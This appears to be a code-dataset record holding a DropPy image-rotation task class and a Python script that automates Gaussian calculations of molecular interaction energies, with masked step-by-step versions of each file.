input_image = Image.open(input_file)
output_image = input_image.rotate(degrees, expand=expand)
output_image.save(output_file)
|
normal
|
{
"blob_id": "df3208a00f7a5dd1ddd76542ac0de85762cc45ab",
"index": 7236,
"step-1": "<mask token>\n\n\nclass Task(object):\n <mask token>\n <mask token>\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-2": "<mask token>\n\n\nclass Task(object):\n <mask token>\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-3": "<mask token>\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-4": "from __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,\n 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n\n def __init__(self, input_dir, output_dir, **kwargs):\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir,\n degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\nimport os\ntry:\n import Image\nexcept ImportError:\n from PIL import Image\nimport sys\n\nsys.path.append(os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, 'DropPy.Common')))\nfrom file_tools import get_file_paths_from_directory\n\n\nclass Task(object):\n \"\"\"\n Documentation: https://docs.droppyapp.com/tasks/image-rotate\n \"\"\"\n def __init__(self, input_dir, output_dir, **kwargs):\n # Get keyword arguments.\n degrees = kwargs.get(str('degrees'), 90.0)\n expand_arg = kwargs.get(str('expand'), True)\n\n # Check arguments.\n if expand_arg is True:\n expand = 1\n elif expand_arg is False:\n expand = 0\n else:\n sys.exit('Argument expand invalid')\n\n # Process files and directories.\n for item_name in os.listdir(input_dir):\n item_path = os.path.join(input_dir, item_name)\n\n if os.path.isfile(item_path):\n self.rotate_file(item_path, output_dir, degrees, expand)\n\n elif os.path.isdir(item_path):\n output_sub_dir = os.path.join(output_dir, item_name)\n os.makedirs(output_sub_dir)\n\n contained_files = get_file_paths_from_directory(item_path)\n for contained_file in contained_files:\n self.rotate_file(contained_file, output_sub_dir, degrees, expand)\n\n @staticmethod\n def rotate_file(input_file, output_dir, degrees, expand):\n output_file_name = os.path.basename(input_file)\n output_file = os.path.join(output_dir, output_file_name)\n\n input_image = Image.open(input_file)\n output_image = input_image.rotate(degrees, expand=expand)\n output_image.save(output_file)\n",
"step-ids": [
2,
3,
4,
6,
7
]
}
|
[
2,
3,
4,
6,
7
] |
import os
import pandas as pd
import time
import sys
from tqdm import tqdm
sys.path.append(os.path.join(os.environ['HOME'],'Working/interaction/'))
from src.make import exec_gjf
from src.vdw import vdw_R, get_c_vec_vdw
from src.utils import get_E
import argparse
import numpy as np
from scipy import signal
import scipy.spatial.distance as distance
import random
def init_process(args):
auto_dir = args.auto_dir
monomer_name = args.monomer_name
os.makedirs(os.path.join(auto_dir,'gaussian'), exist_ok=True)
os.makedirs(os.path.join(auto_dir,'gaussview'), exist_ok=True)
def get_init_para_csv(auto_dir,monomer_name):
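        # Build the initial parameter grid for step3 from the step2-twist minima;
        # the interlayer c vector is estimated from van der Waals contacts via get_c_vec_vdw.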
init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')
df = pd.read_csv('/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'.format(monomer_name))
# df = df[(df["A2"]==30)&(df["A1"]<=0)&(df["A1"]>=-10)&(df["theta"]>45)]
df = df[(df["A2"]==32)&(df["A1"]<=0)&(df["A1"]>=-20)&(df["theta"]>45)]
inner_zip = df[['a','b','theta','A1','A2']].values
print(inner_zip)
init_para_list = []
for a,b,theta,A1,A2 in tqdm(inner_zip):
c = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)
init_para_list.append([np.round(a,1),np.round(b,1),theta,A1,A2,np.round(c[0],1),np.round(c[1],1),np.round(c[2],1),'NotYet'])
df_init_params = pd.DataFrame(np.array(init_para_list),columns = ['a','b','theta','A1','A2','cx','cy','cz','status'])
df_init_params.to_csv(init_params_csv,index=False)
get_init_para_csv(auto_dir,monomer_name)
auto_csv_path = os.path.join(auto_dir,'step3-twist.csv')
if not os.path.exists(auto_csv_path):
df_E = pd.DataFrame(columns = ['a','b','theta','A1','A2','cx','cy','cz','E','E_p','E_t','machine_type','status','file_name'])
else:
df_E = pd.read_csv(auto_csv_path)
df_E = df_E[df_E['status']!='InProgress']
df_E.to_csv(auto_csv_path,index=False)
df_init=pd.read_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'))
df_init['status']='NotYet'
df_init.to_csv(os.path.join(auto_dir,'step3-twist_init_params.csv'),index=False)
def main_process(args):
os.chdir(os.path.join(args.auto_dir,'gaussian'))
isOver = False
while not(isOver):
#check
isOver = listen(args)
time.sleep(1)
def listen(args):
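    # Poll running Gaussian jobs: parse energies from finished logs, update step3-twist.csv,
    # submit the next parameter set when a node is free, and return True once all init params are Done.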
auto_dir = args.auto_dir
monomer_name = args.monomer_name
num_nodes = args.num_nodes
isTest = args.isTest
fixed_param_keys = ['A1','A2']
opt_param_keys = ['a','b','theta','cx','cy','cz']
auto_step2_csv = '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.format(monomer_name)
df_step2 = pd.read_csv(auto_step2_csv)
auto_csv = os.path.join(auto_dir,'step3-twist.csv')
df_E = pd.read_csv(auto_csv)
df_queue = df_E.loc[df_E['status']=='InProgress',['machine_type','file_name','A1','A2','a','b','theta','cx','cy','cz']]
machine_type_list = df_queue['machine_type'].values.tolist()
len_queue = len(df_queue)
maxnum_machine2 = 3#int(num_nodes/2)
for idx,row in zip(df_queue.index,df_queue.values):
machine_type,file_name,A1,A2,a,b,theta,cx,cy,cz = row
log_filepath = os.path.join(*[auto_dir,'gaussian',file_name])
        if not(os.path.exists(log_filepath)):  # skip if the log file has not been created yet (it may be just about to be written)
continue
E_list=get_E(log_filepath)
if len(E_list)!=5:
continue
else:
len_queue-=1;machine_type_list.remove(machine_type)
Ei0,Eip1,Eip2,Eit1,Eit2=map(float,E_list)
Eit3 = Eit2; Eit4 = Eit1
try:
Ep, Et = df_step2[(df_step2['A1']==A1)&(df_step2['A2']==A2)&(df_step2['theta']==theta)&(df_step2['a']==a)&(df_step2['b']==b)][['E_p','E_t']].values[0]
except IndexError:
inner_params_dict = {"A1":A1,"A2":A2,"a":a,"b":b,"theta":theta,'cx':0,'cy':0,'cz':0}
inner_file_name = exec_gjf(auto_dir, monomer_name, inner_params_dict, machine_type,isInterlayer=False,isTest=isTest)
                time.sleep(200)  # one calculation finishes in about 1 min 40 s
is_inner_over = False
while not(is_inner_over):
                    time.sleep(30)  # poll every 30 s; one calculation finishes in about 1 min 40 s
E_inner_list=get_E(inner_file_name)
is_inner_over = len(E_inner_list)==2
Ep, Et=map(float,E_inner_list)
df_newline = pd.Series({**inner_params_dict,'E':2*Ep+4*Et,'E_p':Ep,'E_t':Et,'machine_type':machine_type,'status':'Done','file_name':inner_file_name})
df_step2=df_step2.append(df_newline,ignore_index=True)
df_step2.to_csv(auto_step2_csv,index=False)
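            # Combine the in-plane energies (Ep, Et) with the seven interlayer energies parsed from this log.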
E = 4*Et + 2*Ep + 2*(Ei0 + Eip1+ Eip2 + Eit1 + Eit2 + Eit3 + Eit4)
df_E.loc[idx, ['E_p','E_t','E_i0','E_ip1','E_ip2','E_it1','E_it2','E_it3','E_it4','E','status']] = [Ep,Et,Ei0,Eip1,Eip2,Eit1,Eit2,Eit3,Eit4,E,'Done']
df_E.to_csv(auto_csv,index=False)
            break  # handle only one finished job per pass; two finishing at once would clash
isAvailable = len_queue < num_nodes
machine2IsFull = machine_type_list.count(2) >= maxnum_machine2
machine_type = 1 if machine2IsFull else 2
if isAvailable:
params_dict = get_params_dict(auto_dir,num_nodes, fixed_param_keys, opt_param_keys, monomer_name)
        if len(params_dict)!=0:  # there are still parameter sets left to run
alreadyCalculated = check_calc_status(auto_dir,params_dict)
if not(alreadyCalculated):
file_name = exec_gjf(auto_dir, monomer_name, {**params_dict}, machine_type,isInterlayer=True,isTest=isTest)
df_newline = pd.Series({**params_dict,'E':0.,'E_p':0.,'E_t':0.,'E_i0':0.,'E_ip1':0.,'E_ip2':0.,'E_it1':0.,'E_it2':0.,'E_it3':0.,'E_it4':0.,'machine_type':machine_type,'status':'InProgress','file_name':file_name})
df_E=df_E.append(df_newline,ignore_index=True)
df_E.to_csv(auto_csv,index=False)
init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')
df_init_params = pd.read_csv(init_params_csv)
df_init_params_done = filter_df(df_init_params,{'status':'Done'})
isOver = True if len(df_init_params_done)==len(df_init_params) else False
return isOver
def check_calc_status(auto_dir,params_dict):
df_E= pd.read_csv(os.path.join(auto_dir,'step3-twist.csv'))
if len(df_E)==0:
return False
df_E_filtered = filter_df(df_E, params_dict)
df_E_filtered = df_E_filtered.reset_index(drop=True)
try:
status = get_values_from_df(df_E_filtered,0,'status')
return status=='Done'
except KeyError:
return False
def get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys, monomer_name):
"""
    Precondition:
    step3-twist_init_params.csv and step3-twist.csv exist under auto_dir
"""
init_params_csv=os.path.join(auto_dir, 'step3-twist_init_params.csv')
df_init_params = pd.read_csv(init_params_csv)
df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))
df_init_params_inprogress = df_init_params[df_init_params['status']=='InProgress']
    # initial start-up: not all nodes are busy yet, so dispatch NotYet entries first
if len(df_init_params_inprogress) < num_nodes:
df_init_params_notyet = df_init_params[df_init_params['status']=='NotYet']
for index in df_init_params_notyet.index:
df_init_params = update_value_in_df(df_init_params,index,'status','InProgress')
df_init_params.to_csv(init_params_csv,index=False)
params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()
return params_dict
for index in df_init_params.index:
df_init_params = pd.read_csv(init_params_csv)
init_params_dict = df_init_params.loc[index,fixed_param_keys+opt_param_keys].to_dict()
fixed_params_dict = df_init_params.loc[index,fixed_param_keys].to_dict()
isDone, opt_params_dict = get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name)
if isDone:
            # update the status in df_init_params
df_init_params = update_value_in_df(df_init_params,index,'status','Done')
if np.max(df_init_params.index) < index+1:
status = 'Done'
else:
status = get_values_from_df(df_init_params,index+1,'status')
df_init_params.to_csv(init_params_csv,index=False)
if status=='NotYet':
opt_params_dict = get_values_from_df(df_init_params,index+1,opt_param_keys)
df_init_params = update_value_in_df(df_init_params,index+1,'status','InProgress')
df_init_params.to_csv(init_params_csv,index=False)
return {**fixed_params_dict,**opt_params_dict}
else:
continue
else:
df_inprogress = filter_df(df_cur, {**fixed_params_dict,**opt_params_dict,'status':'InProgress'})
if len(df_inprogress)>=1:
continue
return {**fixed_params_dict,**opt_params_dict}
return {}
def get_opt_params_dict(df_cur, init_params_dict,fixed_params_dict, monomer_name):
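    # Greedy local grid search: scan a and b by +/-0.1 and theta by +/-0.5 around the current best point;
    # returns (False, next_point) while a neighbour still needs computing, (True, best_point) once converged.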
df_val = filter_df(df_cur, fixed_params_dict)
a_init_prev = init_params_dict['a']; b_init_prev = init_params_dict['b']; theta_init_prev = init_params_dict['theta']
A1 = init_params_dict['A1']; A2 = init_params_dict['A2']
while True:
E_list=[];heri_list=[]
for a in [a_init_prev-0.1,a_init_prev,a_init_prev+0.1]:
for b in [b_init_prev-0.1,b_init_prev,b_init_prev+0.1]:
a = np.round(a,1);b = np.round(b,1)
for theta in [theta_init_prev-0.5,theta_init_prev,theta_init_prev+0.5]:
df_val_ab = df_val[
(df_val['a']==a)&(df_val['b']==b)&(df_val['theta']==theta)&
(df_val['A1']==A1)&(df_val['A2']==A2)&
(df_val['status']=='Done')
]
if len(df_val_ab)==0:
cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a,b,theta)
cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)
return False,{'a':a,'b':b,'theta':theta, "cx":cx, "cy":cy, "cz":cz }
heri_list.append([a,b,theta]);E_list.append(df_val_ab['E'].values[0])
a_init,b_init,theta_init = heri_list[np.argmin(np.array(E_list))]
if a_init==a_init_prev and b_init==b_init_prev and theta_init==theta_init_prev:
cx, cy, cz = get_c_vec_vdw(monomer_name,A1,A2,a_init,b_init,theta_init)
cx, cy, cz = np.round(cx,1), np.round(cy,1), np.round(cz,1)
return True,{'a':a_init,'b':b_init, 'theta':theta_init, "cx":cx, "cy":cy, "cz":cz }
else:
a_init_prev=a_init;b_init_prev=b_init;theta_init_prev=theta_init
def get_values_from_df(df,index,key):
return df.loc[index,key]
def update_value_in_df(df,index,key,value):
df.loc[index,key]=value
return df
def filter_df(df, dict_filter):
query = []
for k, v in dict_filter.items():
if type(v)==str:
query.append('{} == "{}"'.format(k,v))
else:
query.append('{} == {}'.format(k,v))
df_filtered = df.query(' and '.join(query))
return df_filtered
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--init',action='store_true')
parser.add_argument('--isTest',action='store_true')
parser.add_argument('--auto-dir',type=str,help='path to dir which includes gaussian, gaussview and csv')
parser.add_argument('--monomer-name',type=str,help='monomer name')
parser.add_argument('--num-nodes',type=int,help='num nodes')
args = parser.parse_args()
if args.init:
print("----initial process----")
init_process(args)
print("----main process----")
main_process(args)
print("----finish process----")
|
normal
|
{
"blob_id": "961bda96e433bb66d592ad1e99c92db0a9ab9fe9",
"index": 8545,
"step-1": "<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\n<mask token>\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\ndef listen(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n num_nodes = args.num_nodes\n isTest = args.isTest\n fixed_param_keys = ['A1', 'A2']\n opt_param_keys = ['a', 'b', 'theta', 'cx', 'cy', 'cz']\n auto_step2_csv = (\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.\n format(monomer_name))\n df_step2 = pd.read_csv(auto_step2_csv)\n auto_csv = os.path.join(auto_dir, 'step3-twist.csv')\n df_E = pd.read_csv(auto_csv)\n df_queue = df_E.loc[df_E['status'] == 'InProgress', ['machine_type',\n 'file_name', 'A1', 'A2', 'a', 'b', 'theta', 'cx', 'cy', 'cz']]\n machine_type_list = df_queue['machine_type'].values.tolist()\n len_queue = len(df_queue)\n maxnum_machine2 = 3\n for idx, row in zip(df_queue.index, df_queue.values):\n machine_type, file_name, A1, A2, a, b, theta, cx, cy, cz = row\n log_filepath = os.path.join(*[auto_dir, 'gaussian', file_name])\n if not os.path.exists(log_filepath):\n continue\n E_list = get_E(log_filepath)\n if len(E_list) != 5:\n continue\n else:\n len_queue -= 1\n machine_type_list.remove(machine_type)\n Ei0, Eip1, Eip2, Eit1, Eit2 = map(float, E_list)\n Eit3 = Eit2\n Eit4 = Eit1\n try:\n Ep, Et = df_step2[(df_step2['A1'] == A1) & (df_step2['A2'] ==\n A2) & (df_step2['theta'] == theta) & (df_step2['a'] ==\n a) & (df_step2['b'] == b)][['E_p', 'E_t']].values[0]\n except IndexError:\n inner_params_dict = {'A1': A1, 'A2': A2, 'a': a, 'b': b,\n 'theta': theta, 'cx': 0, 'cy': 0, 'cz': 0}\n inner_file_name = exec_gjf(auto_dir, monomer_name,\n inner_params_dict, machine_type, isInterlayer=False,\n isTest=isTest)\n time.sleep(200)\n is_inner_over = False\n while not is_inner_over:\n 
time.sleep(30)\n E_inner_list = get_E(inner_file_name)\n is_inner_over = len(E_inner_list) == 2\n Ep, Et = map(float, E_inner_list)\n df_newline = pd.Series({**inner_params_dict, 'E': 2 * Ep + \n 4 * Et, 'E_p': Ep, 'E_t': Et, 'machine_type':\n machine_type, 'status': 'Done', 'file_name':\n inner_file_name})\n df_step2 = df_step2.append(df_newline, ignore_index=True)\n df_step2.to_csv(auto_step2_csv, index=False)\n E = 4 * Et + 2 * Ep + 2 * (Ei0 + Eip1 + Eip2 + Eit1 + Eit2 +\n Eit3 + Eit4)\n df_E.loc[idx, ['E_p', 'E_t', 'E_i0', 'E_ip1', 'E_ip2', 'E_it1',\n 'E_it2', 'E_it3', 'E_it4', 'E', 'status']] = [Ep, Et, Ei0,\n Eip1, Eip2, Eit1, Eit2, Eit3, Eit4, E, 'Done']\n df_E.to_csv(auto_csv, index=False)\n break\n isAvailable = len_queue < num_nodes\n machine2IsFull = machine_type_list.count(2) >= maxnum_machine2\n machine_type = 1 if machine2IsFull else 2\n if isAvailable:\n params_dict = get_params_dict(auto_dir, num_nodes, fixed_param_keys,\n opt_param_keys, monomer_name)\n if len(params_dict) != 0:\n alreadyCalculated = check_calc_status(auto_dir, params_dict)\n if not alreadyCalculated:\n file_name = exec_gjf(auto_dir, monomer_name, {**params_dict\n }, machine_type, isInterlayer=True, isTest=isTest)\n df_newline = pd.Series({**params_dict, 'E': 0.0, 'E_p': 0.0,\n 'E_t': 0.0, 'E_i0': 0.0, 'E_ip1': 0.0, 'E_ip2': 0.0,\n 'E_it1': 0.0, 'E_it2': 0.0, 'E_it3': 0.0, 'E_it4': 0.0,\n 'machine_type': machine_type, 'status': 'InProgress',\n 'file_name': file_name})\n df_E = df_E.append(df_newline, ignore_index=True)\n df_E.to_csv(auto_csv, index=False)\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_init_params_done = filter_df(df_init_params, {'status': 'Done'})\n isOver = True if len(df_init_params_done) == len(df_init_params) else False\n return isOver\n\n\ndef check_calc_status(auto_dir, params_dict):\n df_E = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n if len(df_E) == 0:\n return False\n df_E_filtered = filter_df(df_E, params_dict)\n df_E_filtered = df_E_filtered.reset_index(drop=True)\n try:\n status = get_values_from_df(df_E_filtered, 0, 'status')\n return status == 'Done'\n except KeyError:\n return False\n\n\ndef get_params_dict(auto_dir, num_nodes, fixed_param_keys, opt_param_keys,\n monomer_name):\n \"\"\"\n 前提:\n step3-twist_init_params.csvとstep3-twist.csvがauto_dirの下にある\n \"\"\"\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df_init_params = pd.read_csv(init_params_csv)\n df_cur = pd.read_csv(os.path.join(auto_dir, 'step3-twist.csv'))\n df_init_params_inprogress = df_init_params[df_init_params['status'] ==\n 'InProgress']\n if len(df_init_params_inprogress) < num_nodes:\n df_init_params_notyet = df_init_params[df_init_params['status'] ==\n 'NotYet']\n for index in df_init_params_notyet.index:\n df_init_params = update_value_in_df(df_init_params, index,\n 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n return params_dict\n for index in df_init_params.index:\n df_init_params = pd.read_csv(init_params_csv)\n init_params_dict = df_init_params.loc[index, fixed_param_keys +\n opt_param_keys].to_dict()\n fixed_params_dict = df_init_params.loc[index, fixed_param_keys\n ].to_dict()\n isDone, opt_params_dict = get_opt_params_dict(df_cur,\n init_params_dict, fixed_params_dict, monomer_name)\n if isDone:\n df_init_params = update_value_in_df(df_init_params, index,\n 
'status', 'Done')\n if np.max(df_init_params.index) < index + 1:\n status = 'Done'\n else:\n status = get_values_from_df(df_init_params, index + 1, 'status'\n )\n df_init_params.to_csv(init_params_csv, index=False)\n if status == 'NotYet':\n opt_params_dict = get_values_from_df(df_init_params, index +\n 1, opt_param_keys)\n df_init_params = update_value_in_df(df_init_params, index +\n 1, 'status', 'InProgress')\n df_init_params.to_csv(init_params_csv, index=False)\n return {**fixed_params_dict, **opt_params_dict}\n else:\n continue\n else:\n df_inprogress = filter_df(df_cur, {**fixed_params_dict, **\n opt_params_dict, 'status': 'InProgress'})\n if len(df_inprogress) >= 1:\n continue\n return {**fixed_params_dict, **opt_params_dict}\n return {}\n\n\n<mask token>\n\n\ndef get_values_from_df(df, index, key):\n return df.loc[index, key]\n\n\ndef update_value_in_df(df, index, key, value):\n df.loc[index, key] = value\n return df\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef init_process(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n os.makedirs(os.path.join(auto_dir, 'gaussian'), exist_ok=True)\n os.makedirs(os.path.join(auto_dir, 'gaussview'), exist_ok=True)\n\n def get_init_para_csv(auto_dir, monomer_name):\n init_params_csv = os.path.join(auto_dir, 'step3-twist_init_params.csv')\n df = pd.read_csv(\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist_min.csv'\n .format(monomer_name))\n df = df[(df['A2'] == 32) & (df['A1'] <= 0) & (df['A1'] >= -20) & (\n df['theta'] > 45)]\n inner_zip = df[['a', 'b', 'theta', 'A1', 'A2']].values\n print(inner_zip)\n init_para_list = []\n for a, b, theta, A1, A2 in tqdm(inner_zip):\n c = get_c_vec_vdw(monomer_name, A1, A2, a, b, theta)\n init_para_list.append([np.round(a, 1), np.round(b, 1), theta,\n A1, A2, np.round(c[0], 1), np.round(c[1], 1), np.round(c[2],\n 1), 'NotYet'])\n df_init_params = pd.DataFrame(np.array(init_para_list), columns=[\n 'a', 'b', 'theta', 'A1', 'A2', 'cx', 'cy', 'cz', 'status'])\n df_init_params.to_csv(init_params_csv, index=False)\n get_init_para_csv(auto_dir, monomer_name)\n auto_csv_path = os.path.join(auto_dir, 'step3-twist.csv')\n if not os.path.exists(auto_csv_path):\n df_E = pd.DataFrame(columns=['a', 'b', 'theta', 'A1', 'A2', 'cx',\n 'cy', 'cz', 'E', 'E_p', 'E_t', 'machine_type', 'status',\n 'file_name'])\n else:\n df_E = pd.read_csv(auto_csv_path)\n df_E = df_E[df_E['status'] != 'InProgress']\n df_E.to_csv(auto_csv_path, index=False)\n df_init = pd.read_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv')\n )\n df_init['status'] = 'NotYet'\n df_init.to_csv(os.path.join(auto_dir, 'step3-twist_init_params.csv'),\n index=False)\n\n\ndef main_process(args):\n os.chdir(os.path.join(args.auto_dir, 'gaussian'))\n isOver = False\n while not isOver:\n isOver = listen(args)\n time.sleep(1)\n\n\ndef listen(args):\n auto_dir = args.auto_dir\n monomer_name = args.monomer_name\n num_nodes = args.num_nodes\n isTest = args.isTest\n fixed_param_keys = ['A1', 'A2']\n opt_param_keys = ['a', 'b', 'theta', 'cx', 'cy', 'cz']\n auto_step2_csv = (\n '/home/koyama/Working/interaction/{}/step2-twist/step2-twist.csv'.\n format(monomer_name))\n df_step2 = pd.read_csv(auto_step2_csv)\n auto_csv = os.path.join(auto_dir, 'step3-twist.csv')\n df_E = pd.read_csv(auto_csv)\n df_queue = df_E.loc[df_E['status'] == 'InProgress', ['machine_type',\n 'file_name', 'A1', 'A2', 'a', 'b', 